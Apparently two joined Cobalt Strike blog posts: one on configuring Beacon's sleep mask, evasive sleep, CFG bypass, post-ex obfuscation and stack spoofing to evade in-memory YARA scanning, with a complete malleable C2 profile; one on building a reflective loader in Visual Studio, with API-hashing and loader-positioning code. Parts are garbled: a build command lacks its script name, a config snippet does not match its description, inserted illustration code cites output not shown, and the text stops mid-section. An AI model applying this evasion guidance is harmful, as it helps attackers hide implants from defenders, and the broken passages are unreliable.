Even with all the modifications above, Beacon is still vulnerable to YARA rules targeting the .text/.data sections, as these are all still plainly visible in memory. Furthermore, Beacon’s run time data is similarly exposed (i.e. heap memory).  

The solution to this problem in Cobalt Strike is the sleep mask. The concept of this is simple: before Beacon sleeps, it will mask itself and any related memory (i.e. on the heap). When Beacon checks in it will briefly be exposed, however most of the time its memory will be masked and hence any valid signatures will fail to find their target. This is the key malleable C2 option to be configured. It will ensure that Beacon is only visible in memory for an extremely short window and will provide the most robust defence against in-memory signatures.

Enabling The Sleep Mask

One thing to bear in mind is that there are some extra steps required to make the sleep mask kit correctly mask the .text section when stage.userwx is set to false. While not strictly related to YARA scanning, it is generally advisable to avoid RWX memory (i.e. set userwx to "false") as this is an obvious indicator of code injection and low hanging fruit for memory scanners. Hence, we recommend taking these extra steps to enable both settings. 

Prior to 4.7, sleep mask would only mask the .text section if it was RWX. Hence, if stage.userwx was set to false, Beacon’s .text section would reside in RX memory and would not be masked. The .text section is therefore at risk of trivial detection by the many YARA rules previously discussed and so this is not ideal. 

As of 4.7, we can configure the sleep mask kit to mask the .text section when stage.userwx is set to false. When this is enabled the sleep mask will change the .text protection to RW, mask the section, sleep, unmask the section, and then change the .text protection back to RX.  
To enable this, we need to set the following options in the stage block for our malleable C2 profile:

set userwx "false";
set sleepmask "true";
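The RX to RW, mask, sleep, unmask, RW to RX cycle described above can be modelled with a toy Python sketch. This is a simulation only: the `Section` class and `masked_sleep` function are hypothetical, the protection flag is just a string rather than a real page protection, and the key is an arbitrary example. The signature bytes are the start of the .text fragment flagged earlier by Windows_Trojan_CobaltStrike_663fc95d.

```python
from itertools import cycle
from typing import Callable

SIGNATURE = bytes.fromhex("48 89 5C 24 08 57 48 83 EC 20")


class Section:
    """Toy model of a memory section with a protection flag."""

    def __init__(self, data: bytes, protection: str = "RX") -> None:
        self.data = bytearray(data)
        self.protection = protection

    def xor(self, key: bytes) -> None:
        if "W" not in self.protection:
            raise PermissionError("section is not writable")
        for i, k in zip(range(len(self.data)), cycle(key)):
            self.data[i] ^= k


def masked_sleep(text: Section, key: bytes,
                 while_sleeping: Callable[[Section], bool]) -> bool:
    """Mask, 'sleep' (run the callback), unmask, restore protection."""
    text.protection = "RW"           # RX -> RW so the section can be modified
    text.xor(key)                    # mask
    observed = while_sleeping(text)  # stand-in for the sleep period
    text.xor(key)                    # unmask
    text.protection = "RX"           # RW -> RX before execution resumes
    return observed


def scanner(section: Section) -> bool:
    """Stand-in for an in-memory scan that runs while Beacon sleeps."""
    return SIGNATURE in section.data


text = Section(SIGNATURE + b"\xcc" * 6)
print(scanner(text))                                     # awake: visible
print(masked_sleep(text, b"\xa7\x3c\x5e", scanner))      # asleep: masked
print(scanner(text), text.protection)                    # restored afterwards
```

Note that the section is only writable while it is masked, so it is never writable and executable at the same time.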

After setting these values and restarting the TeamServer, run the build script found within the sleep mask kit. As of the latest version of the Arsenal Kit (20230315), this is performed via the following (example) command:

./ 47 WaitForSingleObject true indirect /tmp/dst

For a full explanation of each parameter, you can run the build script with no arguments. However, the key parameter related to this discussion is the third argument (Mask_text), which should be set to ‘true’. After recompiling, load the resulting .cna script into the Script Manager. For further guidance, see the README found in the sleep mask kit.

As a note, for older versions of the sleep mask kit you will need to set MASK_TEXT_SECTION to 1 in sleepmask.c as demonstrated below:

/* Enable or Disable sleep mask capabilities */
#define MASK_TEXT_SECTION 1

Evasive Sleep Mask

At this point, Beacon will now avoid RWX memory, will not copy over its DLL headers, and will mask itself when sleeping. However, there is one weak link in this approach: the sleep mask itself is still present/exposed in memory. This is shown at a high level below:

Figure 14. A high level diagram showing the memory exposure of Beacon once the sleep mask has been enabled. Beacon itself is now masked, however the default sleep mask is visible in memory and vulnerable to YARA signatures.

The default sleep mask is therefore again a very attractive target for defenders and, unsurprisingly, there are plenty of rules which focus on this remaining in-memory footprint. For example, with both cleanup and sleep mask enabled, the Windows_Trojan_CobaltStrike_b54b94ac rule for the default sleep mask will trigger when Beacon is sleeping as demonstrated below:

Figure 15. The results of running the Elastic Cobalt Strike YARA rules against a process with Beacon injected and using the default sleep mask. Now Beacon is masked, we no longer get any hits for rules targeting code/strings within Beacon, however we do get a YARA hit for a code fragment corresponding to the default sleep mask.

This screenshot shows the call stack for the sleeping Beacon thread (tid: 900) and the results of running the same YARA rules against this process (pid: 5944). Now that Beacon is masked, the YARA rules that we identified before will no longer trigger, however we do see the expected hit for the default sleep mask (Windows_Trojan_CobaltStrike_b54b94ac). Note that we can see that this result was found in the same region of memory as the highlighted unbacked return address in the sleeping thread’s call stack (~0x1b4ef8c00d2). Therefore, even if you’re using Beacon with the default sleep mask, you’re still at risk of being trivially identified via in-memory YARA scanning. 

Clearly then, we also need to obfuscate the sleep mask memory while Beacon sleeps. We can do this by using the evasive sleep mask found in the Arsenal kit. This will use an external mechanism to scramble the sleep mask when sleeping and hence will break any signatures on itself as shown in the diagram below:

Figure 16. A high level diagram showing the memory exposure of Beacon once the evasive sleep mask has been enabled. Both Beacon and the sleep mask are now obfuscated so no YARA rules will fire.

This can be configured by setting the below in sleepmask.c:

#if _WIN64

Also note that to avoid any issues when using the evasive sleep (especially with process injection), ensure that you enable the CFG bypass by modifying evasive_sleep.c to the below:

/*
 *   Enable the CFG bypass technique which is needed to inject into processes
 *   protected by Control Flow Guard (CFG) on supported versions of Windows.
 */
#define CFG_BYPASS 1

Once these two steps have been completed, you can once again rebuild and reload the .cna script for the changes to take effect. 
Alternatively, you could modify the default sleep mask and recompile it to break any static byte patterns or apply your own user-defined sleep mask (UDSM). Generally, customisation is king for both the sleep mask and reflective loading (see the UDRLs section below) and using custom / unknown code will obviously completely break pre-canned YARA signatures.
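
To illustrate why masking defeats static byte signatures, the following is a minimal C++ sketch rather than the actual sleep mask implementation. ContainsPattern() and XorMask() are hypothetical helpers, and the repeating XOR key is an assumption made purely for illustration. A byte pattern that matches in clear memory no longer matches once the region is masked, and matches again after unmasking.

```cpp
#include <algorithm>
#include <cstddef>
#include <cstdint>
#include <vector>

// Hypothetical helper: returns true if `pattern` occurs anywhere in `memory`,
// which is roughly what a plain hex-string signature checks for.
bool ContainsPattern(const std::vector<std::uint8_t>& memory,
                     const std::vector<std::uint8_t>& pattern) {
    return std::search(memory.begin(), memory.end(),
                       pattern.begin(), pattern.end()) != memory.end();
}

// Hypothetical stand-in for a mask routine: XOR every byte with a repeating key.
// Applying it a second time with the same key restores the original bytes.
void XorMask(std::vector<std::uint8_t>& memory,
             const std::vector<std::uint8_t>& key) {
    if (key.empty()) {
        return;  // nothing to do without a key
    }
    for (std::size_t i = 0; i < memory.size(); ++i) {
        memory[i] ^= key[i % key.size()];
    }
}
```

The same reasoning applies to the sleep mask code itself: while its bytes sit unmodified in memory a signature can match them, which is why the evasive sleep scrambles them as well.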


UDRLs

This post has demonstrated that there are numerous signatures for Beacon’s default reflective loader function. With the sleep mask, evasive sleep, and cleanup all enabled, a default reflective loader is less of an issue as our in-memory exposure is extremely limited. However, to avoid default YARA signatures you could consider using a custom UDRL. Our own blog series provides a guide on how to develop UDRLs and there are many excellent open-source UDRLs such as BokuLdr, TitanLdr, and AceLdr.
Note that if you do use a custom UDRL, many of the malleable C2 options outlined above are ignored. This is because how you modify/obfuscate Beacon is coupled with how the reflective loader works. For example, if you obfuscate a section, your reflective loader needs to know how to de-obfuscate it. Hence, it makes sense to leave these details to the UDRL developer to implement.

Post-Ex Reflective DLLs

There is a caveat to the approach suggested so far and that is in respect to post-ex reflective DLLs. As a note, not all post-ex functionality is run as a reflective DLL and many are implemented as BOFs; see the following documentation for a complete guide. 

If we run the same set of YARA rules against a process which has had the Cobalt Strike keylogger injected into it, we get two hits:

1. Default strings found in the keylogger post-ex DLL (the corresponding YARA rule is Windows_Trojan_CobaltStrike_0b58325e):

Windows_Trojan_CobaltStrike_0b58325e 9540 

0x14767a91d42:$a2: keylogger.x64.dll 
0x14767cb2b42:$a2: keylogger.x64.dll 
0x14767a8b568:$a4: %cE=======%c 
0x14767cac368:$a4: %cE=======%c 
0x14767a8b908:$a5: [unknown: %02X] 
0x14767cac708:$a5: [unknown: %02X] 
0x14767a91d54:$b1: ReflectiveLoader 
0x14767cb2b54:$b1: ReflectiveLoader 
0x14767a8b578:$b2: %c2%s%c 
0x14767cac378:$b2: %c2%s%c 
0x14767a8b8c0:$b3: [numlock] 
0x14767cac6c0:$b3: [numlock] 
0x14767a8b562:$b4: %cC%s 
0x14767cac362:$b4: %cC%s 
0x14767a8b658:$b5: [backspace] 
0x14767cac458:$b5: [backspace] 
0x14767a8b8d0:$b6: [scroll lock] 
0x14767cac6d0:$b6: [scroll lock] 
0x14767a8b688:$b7: [control] 
0x14767cac488:$b7: [control] 
0x14767a8b6f4:$b8: [left] 
0x14767cac4f4:$b8: [left] 
0x14767a8b6c8:$b9: [page up] 
0x14767cac4c8:$b9: [page up] 
0x14767a8b6d8:$b10: [page down] 
0x14767cac4d8:$b10: [page down] 
0x14767a8b718:$b11: [prtscr] 
0x14767cac518:$b11: [prtscr] 
0x14767a8b8e0:$b13: [ctrl] 
0x14767cac6e0:$b13: [ctrl] 
0x14767a8b6ec:$b14: [home] 
0x14767cac4ec:$b14: [home] 
0x14767a8b6a0:$b15: [pause] 
0x14767cac4a0:$b15: [pause] 
0x14767a8b670:$b16: [clear] 
0x14767cac470:$b16: [clear]

2. The reflective loader stub (the corresponding YARA rule is Windows_Trojan_CobaltStrike_29374056):

Windows_Trojan_CobaltStrike_29374056 9540 

0x14767a80000:$a1: 4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D EA FF FF FF 48 81 C3 10 19 00 00 FF D3 
0x14767ca0000:$a1: 4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D EA FF FF FF 48 81 C3 10 19 00 00 FF D3

Once again we get duplicate results which correspond to the same rules flagging on both the raw post-ex DLL and the virtual post-ex DLL.
The main malleable C2 option we have to play with for post-ex DLLs is setting ‘post-ex.obfuscate’ to true. This option will: 

  • Statically mask the rdata/data sections 
  • Scrub module/function name strings 
  • Dynamically mask the rdata section at run time for long running tasks (this behaviour will vary between different post-ex DLLs) 
  • Not copy over the DLL headers during reflective loading 
  • Avoid RWX memory (hence if you don’t set this option, post-ex DLLs will use RWX memory) 

Therefore, after enabling post-ex.obfuscate, we are left with a single hit for the reflective loader stub from the raw post-ex DLL (Windows_Trojan_CobaltStrike_29374056). This is because the DLL headers were not copied over to the virtual post-ex DLL and the previously identified strings are now masked in both the raw and virtual DLLs:

Figure 17. The results of running the Elastic Cobalt Strike YARA rules against a process hosting the Cobalt Strike keylogger with post-ex.obfuscate enabled.

Furthermore, once the keylogger job is killed, we still get this result. In fact, neither memory allocation is cleaned up, and both will remain in memory until the process terminates. Note that the obfuscate flag means that the strings in rdata will be cleared when the post-ex DLL thread exits; however, the memory is not freed.

Hence, post-ex reflective DLLs do not properly clean up memory and so carry a real risk of triggering trivial YARA signatures. As a caveat, there will be differences in behaviour for different post-ex reflective DLLs which are not covered in detail here, but the key takeaway is that all of them currently have this limitation.
This is not a risk if you fork and run (which can be noisy) but will be if used either intra-process or for a long running job injected into a separate process. Therefore, be wary when using post-ex reflective DLLs, even with obfuscate enabled, if you know the security controls in place involve in-memory YARA scanning and prefer BOF equivalents where possible. This limitation for post-ex DLLs is something we are planning to overhaul in the 4.9 release.


With the suggested approach outlined in this blog, Beacon is now robust against in-memory YARA scanning. It will be masked in memory for all but an extremely brief check-in window, and when it is visible we have taken as many precautions as possible to limit its exposure.
Our suggested malleable C2 profile therefore looks something like the below:

stage {
     set userwx "false";
     set cleanup "true";
     set obfuscate "true";

     set magic_mz_x64 "<CHANGEME>"; 
     set magic_pe "<CHANGEME>";
     # Alternatively, modify the DOS header via the
     # transform.strrep approach outlined previously. 

     # For sleep mask ensure you:
     # - Enable masking the text section (set Mask_text to true 
     #   when building the kit, or for older sleep mask kits set 
     #   MASK_TEXT_SECTION to 1 in sleepmask.c).
     # - Enable evasive sleep (#define EVASIVE_SLEEP 1 in sleepmask.c).
     # - Enable CFG bypass (#define CFG_BYPASS 1 in evasive_sleep.c).
     # - Ensure sleep mask is recompiled after setting the above
     #   and that the .cna script is loaded into the Script Manager.
     set sleep_mask "true";

     # Remove default strings found in Beacon.
     transform-x64 {
          strrep "ReflectiveLoader" "<CHANGEME>";
          strrep "beacon.x64.dll" "<CHANGEME>";
          strrep "(admin)" "(adm)";
     }
}

Note that this is a suggested profile for bypassing YARA signatures (there are likely to be many other security controls in place and some of these options may not be desired depending on the context).

At this point, the next line of defence for defenders is either traditional memory scanning approaches for injected code or hunting for sleeping threads with unbacked memory (See for an example of this detection technique). Both are much more complicated problems to solve at scale. Furthermore, with the 4.8 release you can enable stack spoofing to bypass the latter. This can be enabled once again by modifying sleepmask.c to the below and recompiling/reloading the resulting .cna script:

// #include "evasive_sleep.c" 
#include "evasive_sleep_stack_spoof.c" 

This does include a default stack to spoof but as ever customisation is recommended. For more guidance see the README in the Arsenal kit.

As a final note, the analysis in this blog post is feeding in to changes that we plan to make in the next Cobalt Strike release. We want to give users more control over the reflective loading process for both Beacon and post-ex DLLs and enable users to easily push back against YARA signatures.

Revisiting the User-Defined Reflective Loader Part 1: Simplifying Development

This blog post accompanies a new addition to the Arsenal Kit – The User-Defined Reflective Loader Visual Studio (UDRL-VS). Over the past few months, we have received a lot of feedback from our users that whilst the flexibility of the UDRL is great, there is not enough information/example code to get the most out of this feature. The intention of this kit is to lower the barrier to entry for developing and debugging custom reflective loaders. This post includes a walkthrough of creating a UDRL in Visual Studio that facilitates debugging, an introduction to UDRL-VS, and an overview of how to apply a UDRL to Beacon.

Note: There are many people out there that prefer to use tools such as MinGW/GCC/LD/GDB etc. and we salute you. However, this post is intended for those of us that like the simplicity of Visual Studio and enjoy a GUI. To develop this template we used Visual Studio Community 2022.

Reflective Loading

Beacon is just a Dynamic Link Library (DLL). As a result, it needs to be “loaded” for us to work with it. There are many different ways to load a DLL in Windows, but Reflective DLL Injection, first published by Stephen Fewer in 2008, provides the means to load a DLL completely in memory. There is a lot of information available regarding PE files, reflective loading, and even improving upon Reflective DLL Injection. Therefore, this post will not delve into this in much detail. Fundamentally though, a reflective loader must:

  • Allocate some memory.
  • Copy the target DLL into that memory allocation.
  • Parse the target DLL’s imports/load the required modules/resolve function addresses.
  • Rebase the DLL (fix the relocations).
  • Locate the DLL’s Entry Point.
  • Execute the Entry Point.
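
As a rough illustration of the rebasing step, the sketch below applies a load-address delta to a list of 64-bit fixups. It is a simplified, portable model and not Beacon’s loader: ApplyRelocations(), the flat list of fixup offsets, and the base addresses are all assumptions, and a real loader walks the PE base relocation directory instead. It also assumes the host byte order matches the image (little-endian).

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical, simplified model of the "rebase" step: every listed offset
// holds a 64-bit absolute address that was computed for `preferredBase`.
void ApplyRelocations(std::vector<std::uint8_t>& image,
                      const std::vector<std::size_t>& fixupOffsets,
                      std::uint64_t preferredBase,
                      std::uint64_t actualBase) {
    // Unsigned arithmetic wraps, so this also works when actualBase < preferredBase.
    const std::uint64_t delta = actualBase - preferredBase;
    for (std::size_t offset : fixupOffsets) {
        // Skip entries that would read or write outside the image.
        if (offset > image.size() || image.size() - offset < sizeof(std::uint64_t)) {
            continue;
        }
        std::uint64_t value = 0;
        std::memcpy(&value, image.data() + offset, sizeof(value));
        value += delta;  // shift the stored address to the new base
        std::memcpy(image.data() + offset, &value, sizeof(value));
    }
}
```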

In Stephen Fewer’s original implementation, the code used to load the DLL into memory is compiled into the DLL and “exported” as a function. This is how Beacon’s default reflective loader works; if you inspect Beacon’s exported functions you’ll find one called ReflectiveLoader() which is where the magic happens. The following screenshot shows Beacon’s Export Address Table (EAT) and its ReflectiveLoader() function in CFF Explorer.

Figure 1. Beacon’s Export Address Table in CFF Explorer.

Note: Typically, when a reflective loader is implemented in this fashion, a small shellcode stub is also written to the start of the PE file (over the DOS header) to ensure that execution is correctly directed to the right place (the ReflectiveLoader() function). This is what makes it position independent as it’s possible to simply write the reflective DLL to memory, start a thread and let it run.

In 2017, an analysis of the Double Pulsar User Mode Injector (Double Pulsar) leaked by Shadow Brokers showed an alternate approach to reflective loading (archive link). Double Pulsar differed because it was not compiled into the DLL but prepended in front of it. This approach allowed it to reflectively load any DLL. Later in 2017, the Shellcode Reflective DLL Injection (sRDI) project was released which used a similar approach. sRDI is able to take an arbitrary PE file and make it position independent which means it can also be used to load Beacon.

The following high-level diagram shows the different locations of the reflective loader between Stephen Fewer’s approach and Double Pulsar.

Figure 2. The different locations of ReflectiveLoader().

The User-Defined Reflective Loader (UDRL)

The UDRL is an important aspect of Cobalt Strike’s evasion strategy. Cobalt Strike achieves “evasion through flexibility”, meaning we give you the tools you need to modify default behaviors and customize Beacon to your liking. This was something that Raphael Mudge felt strongly about and will remain a key part of the Cobalt Strike strategy moving forward.

As described above, Beacon’s default ReflectiveLoader() is compiled into Beacon and exported. As a result, the UDRL was originally intended to work in the same fashion. The Teamserver would take a given UDRL and use it to overwrite Beacon’s default ReflectiveLoader() function. A great example of a UDRL that utilizes this workflow is BokuLoader by Bobby Cooke.

In this blog post, we’ll be exploring the same approach used by Double Pulsar and will therefore append Beacon to our loader as shown in Figure 2. TitanLdr by Austin Hudson is an excellent example of a UDRL that uses this approach. AceLdr by Kyle Avery is another very good example that also includes some additional functionality for avoiding memory scanners.

There are likely many other UDRLs available, and without a doubt even more that have not been made public. The above projects have been mentioned as they are impressive public examples. If you’ve developed a UDRL for Cobalt Strike yourself and you’d like to share it, you can submit it to the Cobalt Strike Community Kit.

Enter Visual Studio

The original UDRL example provided in the Arsenal Kit is a slightly modified version of Stephen Fewer’s reflective loader, so here we’ll also start in the same place. To save a lot of unnecessary content, we will not cover the process of creating an empty Visual Studio project and copy/pasting code. The only slight difference at this stage however is that our project files were created with the .cpp extension. This minor change to .cpp allows the project to access some additional functionality (more on this later). For clarity, the folder layout of the project after copy/pasting Stephen Fewer’s code has been illustrated below.

├── Header Files/
│   ├── ReflectiveDLLInjection.h
│   └── ReflectiveLoader.h
├── Source Files/
    └── ReflectiveLoader.cpp

The purpose of this Visual Studio project is to create a PE executable file that contains our reflective loader. This executable file can then be compiled in either Debug mode or Release mode. In Debug mode it can be used in combination with Visual Studio’s debugger to step through the code and debug our loader. In Release mode, we can strip our loader out of the resulting executable and prepend it to Beacon to create a Double Pulsar style payload as illustrated in Figure 2.

To compile the project and ensure that it executes correctly, we need to change some of Visual Studio’s Project Settings. These have been outlined below:

  • Entry Point (ReflectiveLoader) – This setting changes the default starting address to Stephen Fewer’s ReflectiveLoader() function. A custom entry point would normally be problematic for a traditional PE file and require some manual initialization. However, Stephen Fewer’s code is position independent, so this won’t be a problem.
  • Enable Intrinsic Functions (Yes) – Intrinsic functions are built into the compiler and make it possible to “call” certain assembly instructions. These functions are “inlined” automatically which means the compiler inserts them at compile time.
  • Ignore All Default Libraries (Yes) – This setting will alert us when we call external functions (as that would not be position independent).
  • Basic Runtime Checks (Default) – This setting is configured correctly in Release mode by default, but changing it in the Debug configuration disables some runtime error checking that will throw an error due to our custom entry point.
  • Optimization – We’ve enabled several of Visual Studio’s different Optimization settings and opted to favor smaller code where possible. However, at certain points in the template we’ve disabled it to ensure our code works as expected.

Note: Optimization can be great because it makes our code smaller and faster. However, it’s important to know what can be optimized and what can’t, which is made even more complex when writing position independent code. If you run into problems, it can be worth checking whether something is being optimized away by the compiler.

Function Positioning

In this post, we are using the Double Pulsar approach to reflective loading. Therefore, after compiling the Release build, we will extract the loader from the resulting executable and prepend it to Beacon to create our payload. As part of this model, we need to ensure that the loader’s entry point sits at the very start of the shellcode. We also need to make sure that we can identify the end of the loader in order to find out where Beacon begins. This has been illustrated in the following high-level diagram:

Figure 3. A high-level overview of Function Positioning.
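
The layout in Figure 3 can be sketched in a few lines of C++. PrependLoader() and DllOffset() are hypothetical names used only for this illustration; the point is that the loader bytes come first, so execution starts in the loader, and the DLL begins immediately after it.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Hypothetical helper: builds a Double Pulsar style payload (loader followed by DLL).
std::vector<std::uint8_t> PrependLoader(const std::vector<std::uint8_t>& loader,
                                        const std::vector<std::uint8_t>& dll) {
    std::vector<std::uint8_t> payload;
    payload.reserve(loader.size() + dll.size());
    payload.insert(payload.end(), loader.begin(), loader.end());  // entry point at offset 0
    payload.insert(payload.end(), dll.begin(), dll.end());        // DLL follows the loader
    return payload;
}

// The DLL starts exactly where the loader ends.
std::size_t DllOffset(const std::vector<std::uint8_t>& loader) {
    return loader.size();
}
```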

There are different ways to achieve this “positioning”; however, for the purposes of this template we have used the code_seg pragma directive. code_seg can be used to specify which section is used to store specific functions. These sections can then be ordered using alphabetical values, e.g. .text$a. This is possible because the linker splits each section name at the first dollar sign and uses the value after it to sort the sections, which facilitates the alphabetical ordering. A similar approach to function ordering can also be seen in link.ld in both TitanLdr and AceLdr.

In the example below, we have placed the ReflectiveLoader() function within .text$a to ensure that it is positioned at the start of the .text section and therefore the start of the payload. The remaining functions in ReflectiveLoader.cpp have been placed inside .text$b to ensure that they are located after ReflectiveLoader(). The compiler can order the functions within a given section however it chooses, so this approach of using $a and $b enforces the required layout.

#pragma code_seg(".text$a")
ULONG_PTR WINAPI ReflectiveLoader(VOID) {
    // ... loader body elided ...
}
#pragma code_seg(".text$b")
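
The ordering rule described above can be modelled with a short, portable C++ sketch. OrderContributions() is a hypothetical helper, not part of the template or the linker: it assumes every name belongs to the same base section and simply sorts by the text after the first dollar sign, treating a missing suffix as empty.

```cpp
#include <algorithm>
#include <cstddef>
#include <string>
#include <vector>

// Hypothetical model of the grouping rule: contributions named
// "<section>$<suffix>" are merged into "<section>" and ordered by suffix.
std::vector<std::string> OrderContributions(std::vector<std::string> names) {
    auto suffixOf = [](const std::string& name) {
        const std::size_t dollar = name.find('$');
        return dollar == std::string::npos ? std::string() : name.substr(dollar + 1);
    };
    // stable_sort keeps the original order of contributions with equal suffixes.
    std::stable_sort(names.begin(), names.end(),
                     [&](const std::string& a, const std::string& b) {
                         return suffixOf(a) < suffixOf(b);
                     });
    return names;
}
```

Passing .text$z, .text$b, and .text$a in that order yields .text$a, .text$b, .text$z, which mirrors the layout the template relies on.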

Note: In some public examples of reflective loaders, a small shellcode stub is used at the very start of execution to ensure stack alignment. This approach is not explicitly required in our template at this point as the loader is intended for use with memory allocation/thread creation APIs for simplicity. It should therefore be aligned correctly. If you do require this stack alignment, it would still be possible to use a similar shellcode stub in this model but it can be left as an exercise for the reader. Matt Graeber’s Writing Optimized Windows Shellcode in C and the associated PIC_Bindshell code demonstrate this. In addition, it can also be found in TitanLdr/AceLdr in start.asm.

We can use the same approach described above to also locate the end of the loader. In the code snippet below, we have used the code_seg directive once more to position the LdrEnd() function. Previously, we used $a to position ReflectiveLoader() at the start of the .text section and here we are using $z to position LdrEnd() at the end of it.

#pragma code_seg(".text$z")
void LdrEnd() {}

The following high-level diagram illustrates the code sections described above.

Figure 4. A high-level overview of Function Positioning with alphabetical values.

The Release build is designed to work with the Teamserver which will append Beacon to our loader. As part of the Debug build, we need to simulate the Release mode behavior. The code_seg directive can also be used in combination with the declspec allocate specifier to position the contents of data items. In the example below, we use the code_seg directive to specify a section, and then use the declspec specifier to place the contents of Beacon.h (unsigned char beacon_dll[]) within it. This logic was placed in End.h/End.cpp for simplicity.

#ifdef _DEBUG
#pragma code_seg(".text$z")
__declspec(allocate(".text$z"))
#include "Beacon.h"
#endif

The folder layout after adding the above files to the project has been illustrated below.

├── Header Files/
│   ├── Beacon.h
│   ├── End.h
│   ├── ReflectiveDLLInjection.h
│   └── ReflectiveLoader.h
├── Source Files/
    ├── End.cpp
    └── ReflectiveLoader.cpp

This is the crux of our development environment: by positioning LdrEnd()/Beacon.h, we’re able to easily find the location of Beacon. This change to Stephen Fewer’s original code is shown below.

#ifdef _DEBUG
    uiLibraryAddress = (ULONG_PTR)beacon_dll;
#elif _WIN64
    uiLibraryAddress = (ULONG_PTR)&ldr_end + 1;
#else
    // x86 Release build: the address is derived via GetLocation() (see the note below).
#endif

Note: The x86 version of the Release build works in a slightly different fashion to the one described above. Positioning LdrEnd() and referencing its address works in x64 because the compiler identifies it using relative addressing. Disassembling the binary shows a “load effective address” at [rip + offset] (LEA RSI,[RIP+0X6B9]). This approach does not work in x86 because the absolute address of LdrEnd() is calculated at compile time. Therefore, it points to a completely incorrect location when the loader is prepended to Beacon (MOV EBX, 0X401600). To provide support for x86, we recycled Stephen Fewer’s caller() function in our template and renamed it to GetLocation(). This function simply returns the calling function’s return address via the _ReturnAddress() intrinsic function. Instead of referencing the address of LdrEnd() in x86, we call it, which in turn calls GetLocation(). We then use simple pointer arithmetic to work out the location of Beacon. We could’ve done this for both x86 and x64 but included both to show the two approaches and highlight the difference.

At this point, we now have an operational Debug build. We can set a breakpoint, click “Local Windows Debugger”, and use all the features of Visual Studio’s debugger.


In the previous section we used Stephen Fewer’s original reflective DLL injection code to show that only minor modifications were required to get up and running. However, we wanted to take this a step further and provide a template to support developing and debugging UDRLs for Cobalt Strike.

As part of creating this template, we have attempted to simplify Stephen Fewer’s original code by splitting it into separate functions, removing unused code, updating types and providing more descriptive variable names. In addition, we have also provided some helper functions to speed up writing position independent code (PIC). The following sections provide an overview of these helper functions. For additional help writing PIC, there is an excellent public framework available called ShellcodeStdio that also demonstrates the techniques described below.

Compile Time Hashing

In Stephen Fewer’s original code, several hashes had been pre-calculated and included in ReflectiveLoader.h. This solution works well, but to simplify it further and make it easier for you to include your own hashes, we have added “compile time hashing”.

As the CPP reference states, the “constexpr” specifier makes it possible to “evaluate the value of a function or variable at compile time”. Therefore, it is possible to use the constexpr specifier as part of a hash function to ensure that the hash is generated at compile time. This means instead of pre-calculating hashes and including them in our header file, we can have the compiler hash our strings for us.

Note: Compile time hashing will help us more in a subsequent post, but at this point, an added benefit is that it makes it easier to rotate Stephen Fewer’s HASH_KEY value used to hash the strings. It is not a silver bullet but changing the HASH_KEY could help to push back on simple static signatures.

In the template, we have replaced Stephen Fewer’s static hash values with calls to CompileTimeHash().

constexpr DWORD KERNEL32DLL_HASH = CompileTimeHash("kernel32.dll");
constexpr DWORD NTDLLDLL_HASH = CompileTimeHash("ntdll.dll");

constexpr DWORD LOADLIBRARYA_HASH = CompileTimeHash("LoadLibraryA");
constexpr DWORD GETPROCADDRESS_HASH = CompileTimeHash("GetProcAddress");
constexpr DWORD VIRTUALALLOC_HASH = CompileTimeHash("VirtualAlloc");
constexpr DWORD NTFLUSHINSTRUCTIONCACHE_HASH = CompileTimeHash("NtFlushInstructionCache");

Note: We have also modified the original hash() function in the template to normalize strings to uppercase before hashing so that “lOadLiBrarYa” and “LoadLibraryA” result in the same hash.
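
For readers who want to see the idea in isolation, the following is a minimal sketch of a constexpr hash and not the template’s actual CompileTimeHash(). The rotate-right-and-add scheme, the HASH_KEY value of 13, and the helper names RotateRight() and ToUpper() are assumptions for illustration; the static_assert shows that the hash is evaluated by the compiler and that case is normalized.

```cpp
#include <cstdint>

// Assumed key for this sketch; changing it changes every resulting hash.
constexpr std::uint32_t HASH_KEY = 13;

// Rotate a 32-bit value right by `bits` (valid for 1..31).
constexpr std::uint32_t RotateRight(std::uint32_t value, std::uint32_t bits) {
    return (value >> bits) | (value << (32 - bits));
}

// ASCII-only uppercase conversion that does not depend on the C runtime.
constexpr char ToUpper(char c) {
    return (c >= 'a' && c <= 'z') ? static_cast<char>(c - 'a' + 'A') : c;
}

// Hypothetical compile time hash: rotate, then add each uppercased character.
constexpr std::uint32_t CompileTimeHash(const char* str) {
    std::uint32_t hash = 0;
    for (; *str != '\0'; ++str) {
        hash = RotateRight(hash, HASH_KEY);
        hash += static_cast<std::uint32_t>(static_cast<unsigned char>(ToUpper(*str)));
    }
    return hash;
}

// Evaluated entirely by the compiler; no hash code runs at startup.
static_assert(CompileTimeHash("lOadLiBrarYa") == CompileTimeHash("LoadLibraryA"),
              "hash should be case-insensitive");
```

Because the functions are constexpr, assigning the result to a constexpr variable (as in the declarations above) forces the evaluation to happen at compile time, so the plaintext API names need not appear in the compiled loader.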


It can be helpful to print strings as part of debugging, but as we mentioned earlier, a custom entry point can affect startup routines, etc. This means that at the start of execution we do not have direct access to the C/C++ standard library or any Windows APIs.

As part of simplifying Stephen Fewer’s original code, we broke it down into independent functions. As a result, we now have a GetProcAddressByHash() function in Utils.cpp that we can use to resolve function addresses. To save a lot of time and effort we have used this to create a _printf() function for Debug purposes and included it in our template. This _printf() function works in the same way as the original printf() so you can give it format specifiers and use it to print variables, etc. We also wrapped it into a macro called PRINT() which will only generate the _printf() calls when the project is compiled in Debug mode.

PRINT("[+] Beacon Start Address: %p\n", beaconBaseAddress);

Here is a screenshot of the above function in action. We have printed the location of Beacon and then found it using the disassembly view in Visual Studio.

Figure 5. Finding Beacon’s MZ Header with a call to PRINT().
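
A debug-only macro of this kind can be sketched as follows. This is an assumption about the general shape and not the template’s code: in the template _printf() is resolved at run time via GetProcAddressByHash(), whereas std::printf is used here only so that the sketch compiles and runs anywhere.

```cpp
#include <cstdio>

// Assumption: _DEBUG is defined by the Debug build configuration.
#ifdef _DEBUG
// Debug build: forward the format string and arguments to the print routine.
#define PRINT(...) std::printf(__VA_ARGS__)
#else
// Release build: the call and its string arguments compile away entirely.
#define PRINT(...) ((void)0)
#endif
```

Compiling the print calls out of the Release build matters here because any leftover format strings would live outside the .text section and would not survive extraction of the loader.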


Strings are saved into the .data/.rdata section of a PE file and will therefore be unavailable once we extract the loader (which will be exclusively found in the .text section). It’s therefore important to understand how strings are created and stored within a PE file. Compiler Explorer is an excellent website for seeing how your code is assembled and even color codes the input/output. The following screenshot shows three different approaches to declaring strings in C++.

